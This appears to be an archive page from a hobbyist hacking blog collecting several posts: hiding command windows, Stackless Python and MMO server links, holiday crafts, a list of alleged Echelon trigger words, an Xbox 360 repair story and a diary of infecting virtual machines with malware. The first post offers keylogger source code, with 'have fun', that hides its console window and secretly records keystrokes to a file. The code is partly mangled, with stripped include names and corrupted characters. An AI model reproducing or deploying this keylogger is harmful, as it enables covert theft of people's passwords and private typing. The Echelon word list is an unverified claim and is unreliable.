Archive for the ‘Experiments’ Category

Here is a simple example keylogger code written in C

it has the ability to hide the cmd window

have fun

#include
#include
#include
#define _WIN32_WINNT 0×0500
#include

using namespace std;

int main(int argc, char *argv[])
{
HWND win;
win = GetConsoleWindow();
ShowWindow(win, SW_HIDE);
ofstream myfile;
myfile.open(“C:\\keys.txt”);
while (1) {
int i;
short keyit;
for (i = 32; i <= 256; i++) {
keyit = GetAsyncKeyState(i);
if (keyit == -32767) {
int keyEnd;
keyEnd = 81;
myfile << char(i);
if (i == keyEnd) {
myfile.close();
}
}
}
}
return 0;
}

I had an issue running a private World of Warcraft server, there were to many open command windows on my PC  which I also use for development.  Here is a solution which I found.

Head over to:

http://www.commandline.co.uk/cmdow/

to get a list of Windows open in particular there handles


cmdow.exe /T


In my case I wanted the handle the command(cmd) windows which were open

Let’s hide em’


cmdow.exe handle /hid


*cheers

Recently while perusing around the net looking at stuff to try to find a solution to a roadblock for a game I’m designing Ive found some interesting stuff I thought I would share with you.  The first one I would like to introduce to you is Stackless Python.

Stackless Python is what you want to use if you program in Python and you want to take advantage of multi-threading technology.  Take a look a the game Eve-Online for example, that game was built on Stackless Python and eventually they did some modifications and enhancements to a network layer with it(pretty sure it was network layer) and dubbed it StacklessIO,   this boosted the games performance to sweet ass levels…to date I have found no code examples of StacklessIO. Please share if you know any resources.  If you want to know more about Stackless Python check out the official website at www.stackless.com

here are some simple examples of Stackless (HTTPServer, RPC, MUD Server, Chat Server)

http://code.google.com/p/stacklessexamples/wiki/StacklessNetworking

The next thing I want to share with you is a small series of articles from IBM on Massively Multiplayer Online (MMO) server architecture.  This series is a great resource on the foundations of MMO with easy to follow examples check em out:

http://www.ibm.com/developerworks/library/ar-powerup1/

http://www.ibm.com/developerworks/library/ar-powerup2/

Well, well, well, its that time of year when you hang up your stockings on the mantle, put up the christmas tree and wrap gifts for everyone you got gifts for.  It’s so much fun going out and spending money on other people.  Riiight. Anyways enjoy this photo for a minute while you scroll down, I will meet you there in a minute.

Ok, so how merry was that?  So what do all us geeks and hackers do to get in the holiday spirit?  Other than cache up with some new jQuery flavor or merge all our computers into one big case that looks like it could contain the armaments for the upcoming world war, some of us make things to give to others.  I usually draw up a card for family members and stuff, usually with a crayon.  But some others have found it a good idea to share their experiences of making things to help spread holiday cheer, and you can find them at Instructables.com.

I am aw inspired by the person making gift bags from cereal boxes.

As well these could be a fun experiment for those of you who enjoy electronic and robotic projects, help your mom hook up that ultimate toy train guest greeter.

Got an idea or good example of something hacked for the holidays? LET US KNOW!

These are trigger words that supposedly trigger the Echelon Spying device used by US,UK, Canada and New Zealand. I found them on TheRegister.

Rewson, SAFE, Waihopai, INFOSEC, ASPIC, MI6, Information Security, SAI, Information Warfare, IW, IS, Privacy, Information Terrorism, Terrorism Defensive Information, Defense Information Warfare, Offensive Information, Offensive Information Warfare, The Artful Dodger, NAIA, SAPM, ASU, ASTS, National Information Infrastructure, InfoSec, SAO, Reno, Compsec, JICS, Computer Terrorism, Firewalls, Secure Internet Connections, RSP, ISS, JDF, Ermes, Passwords, NAAP, DefCon V, RSO, Hackers, Encryption, ASWS, CUN, CISU, CUSI, M.A.R.E., MARE, UFO, IFO, Pacini, Angela, Espionage, USDOJ, NSA, CIA,
S/Key, SSL, FBI, Secert Service, USSS, Defcon, Military, White House, Undercover, NCCS, Mayfly, PGP, SALDV, PEM, resta, RSA, Perl-RSA, MSNBC, bet, AOL, AOL TOS, CIS, CBOT, AIMSX, STARLAN, 3B2, BITNET, SAMU, COSMOS, DATTA,
Furbys, E911, FCIC, HTCIA, IACIS, UT/RUS, JANET, ram, JICC, ReMOB, LEETAC, UTU, VNET, BRLO, SADCC, NSLEP, SACLANTCEN, FALN, 877, NAVELEXSYSSECENGCEN, BZ, CANSLO, CBNRC, CIDA, JAVA, rsta, Active X, Compsec 97, RENS, LLC, DERA, JIC, rip, rb, Wu, RDI, Mavricks, BIOL, Meta-hackers, ^?, SADT, Steve Case, Tools, RECCEX, Telex, Aldergrove, OTAN, monarchist, NMIC, NIOG, IDB, MID/KL, NADIS, NMI, SEIDM, BNC, CNCIS, STEEPLEBUSH, RG, BSS, DDIS, mixmaster, BCCI, BRGE, Europol, SARL, Military Intelligence, JICA, Scully, recondo, Flame, Infowar, FRU, Bubba, Freeh, Archives, ISADC, CISSP, Sundevil, jack, Investigation, JOTS, ISACA, NCSA, ASVC, spook words, RRF, 1071, Bugs Bunny, Verisign, Secure, ASIO, Lebed, ICE, NRO, Lexis-Nexis, NSCT, SCIF, FLiR, JIC, bce, Lacrosse, Flashbangs, HRT, IRA, EODG, DIA, USCOI, CID, BOP, FINCEN, FLETC, NIJ, ACC, AFSPC, BMDO, site, SASSTIXS, NAVWAN, NRL, RL, NAVWCWPNS, NSWC, USAFA, AHPCRC, ARPA, SARD, LABLINK, USACIL, SAPT, USCG, NRC, ~, O, NSA/CSS, CDC, DOE, SAAM, FMS, HPCC, NTIS, SEL, USCODE, CISE, SIRC, CIM, ISN, DJC, LLNL, bemd, SGC, UNCPCJ, CFC, SABENA, DREO, CDA, SADRS, DRA, SHAPE, bird dog, SACLANT, BECCA, DCJFTF, HALO, SC, TA SAS, Lander, GSM, T Branch, AST, SAMCOMM, HAHO, FKS, 868, GCHQ, DITSA, SORT, AMEMB, NSG, HIC, EDI, benelux, SAS, SBS, SAW, UDT, EODC, GOE, DOE, SAMF, GEO, JRB, 3P-HV, Masuda, Forte, AT, GIGN, Exon Shell, radint, MB, CQB, TECS, CONUS, CTU, RCMP, GRU, SASR, GSG-9, 22nd SAS, GEOS, EADA, SART, BBE, STEP, Echelon, Dictionary, MD2, MD4, MDA, diwn, 747, ASIC, 777, RDI, 767, MI5, 737, MI6, 757, Kh-11, EODN, SHS, ^X, Shayet-13, SADMS, Spetznaz, Recce, 707, CIO, NOCS, Halcon, NSS, Duress, RAID, Uziel, wojo, Psyops, SASCOM, grom, NSIRL, D-11, DF, ZARK, SERT, VIP, ARC, S.E.T. Team, NSWG, MP5k, SATKA, DREC, DEVGRP, DSD, FDM, GRU, LRTS, SIGDEV, NACSI, MEU/SOC,PSAC, PTT, RFI, ZL31, SIGDASYS, TDM. SUKLO, Schengen, SUSLO, TELINT, fake, TEXTA. ELF, LF, MF, Mafia, JASSM, CALCM, TLAM, Wipeout, GII, SIW, MEII, C2W, Burns, Tomlinson, Ufologico Nazionale, Centro, CICAP, MIR, Belknap, Tac, rebels, BLU-97 A/B, 007, nowhere.ch, bronze, Rubin, Arnett, BLU, SIGS, VHF, Recon, peapod, PA598D28, Spall, dort,
50MZ, 11Emc Choe, SATCOMA, UHF, The Hague, SHF, ASIO, SASP, WANK, Colonel, domestic disruption, 5ESS, smuggle, Z-200, 15kg, DUVDEVAN, RFX, nitrate, OIR, Pretoria, M-14, enigma, Bletchley Park, Clandestine, NSO, nkvd, argus,

Read the rest of this entry »

Ok, so we all know of the 3 Red Ring of Death problems that plague Xbox 360 owners. Another plague of the console is the Black Screen of Death. You have a black screen or, theres no video just a bunch of white dots, lines discolorations etc…yet you still have audio. Well it’s no guess it’s a video problem, and any real gamer normally checks their cables before saying anything to anyone. I simply hate that! You have a thread on a forum where theres all these people talking about this one problem and some shmuck comes in there and says ‘check your cables, try a different TV, try different cables and yada yada’, BULLSHIT! I can understand there may be one or two dumbasses out there that don’t try that, but c’mon lets be real here, it’s more than likely they’ve tried it.

Recently Flyninja received a donated Xbox 360 console that has the so called ‘Black Screen of Death.’ Now I don’t want to say that any of us here are Xbox experts, and can fix them everytime, but I will say I am intrigued by the system for hacking purposes. Of course I started to troubleshoot the console by checking the cables etc. Ok so its not my cables or my TV.

Next I tried the towel method and was able to get the system to play games for a limited amount of time. This still did not show any kind of permanent results. So I went and opened the blasted thing to have a look around.

So after opening the console, I ran a game – worked…I played a movie – worked. The console has been running uninterrupted for about 4 hours now.

Just thought I would give everyone an update to this bugger and I hope that this insight may help you in the future.

For a month and a half now I have been running a virtual windows machine on my linux box with the sole intent of infecting it with all sorts of malware that I would find specifically on mininova. So I proceded downloading various .exe files which I was pretty sure were infected with some sort of malware. After doing so for more than a month now I have a few things to say about what I think I have achieved by doing so.

I have created two virtual windows XP machines for this task. With the first one I have begun a few weeks before this year ended. That virtual machine is infected with more than a dozen instances of malware or spyware. I have installed AVG AV (free version) in order to keep a track of these infections. Of course I do not allow AVG to hamper my progress. I usually have it disabled.

My second virtual machine is also infected by many instances of spyware. In addition to being infected by all sorts of spaware I also have a very resiliant piece of adaware on it. I have tried to get rid of it several times but with out luck so far. I have used the free versions of AVG AV, AVG anti-spyware and even ad-aware. So far none of these tools got rid of it.

One would expect that having a machine infected with that many instances of malware some hacker would find a way in and take over the machine. Well, so far nothing like that has happened. Except for one instance where my firewall Blackice loged a critical event I could not say that I have noticed any other hacker activity.

I need to say that I have had quite some fun doing this. I have enjoyed downloading files that I would never of have done with personal data on my box. I just allowed my cusiosity to take the lead and soon enough I was installing tools that could offer not benefeit to my comptuer and most often than not were some script kiddie tools. Of course I have also downloaded other files like wow related tools, small games, and other various programs. I mostly tried to keep to small files that did not exceded 50MB.

I have also posted some of the results on various info/sec forums that I frequent and was quite surprised with some of the answears that I have received. So far I have felt encouraged to continue doing this and most likelly I am going to continue doing this. I feel that this sort of material is of some value to the info/sec sites that I am a member off.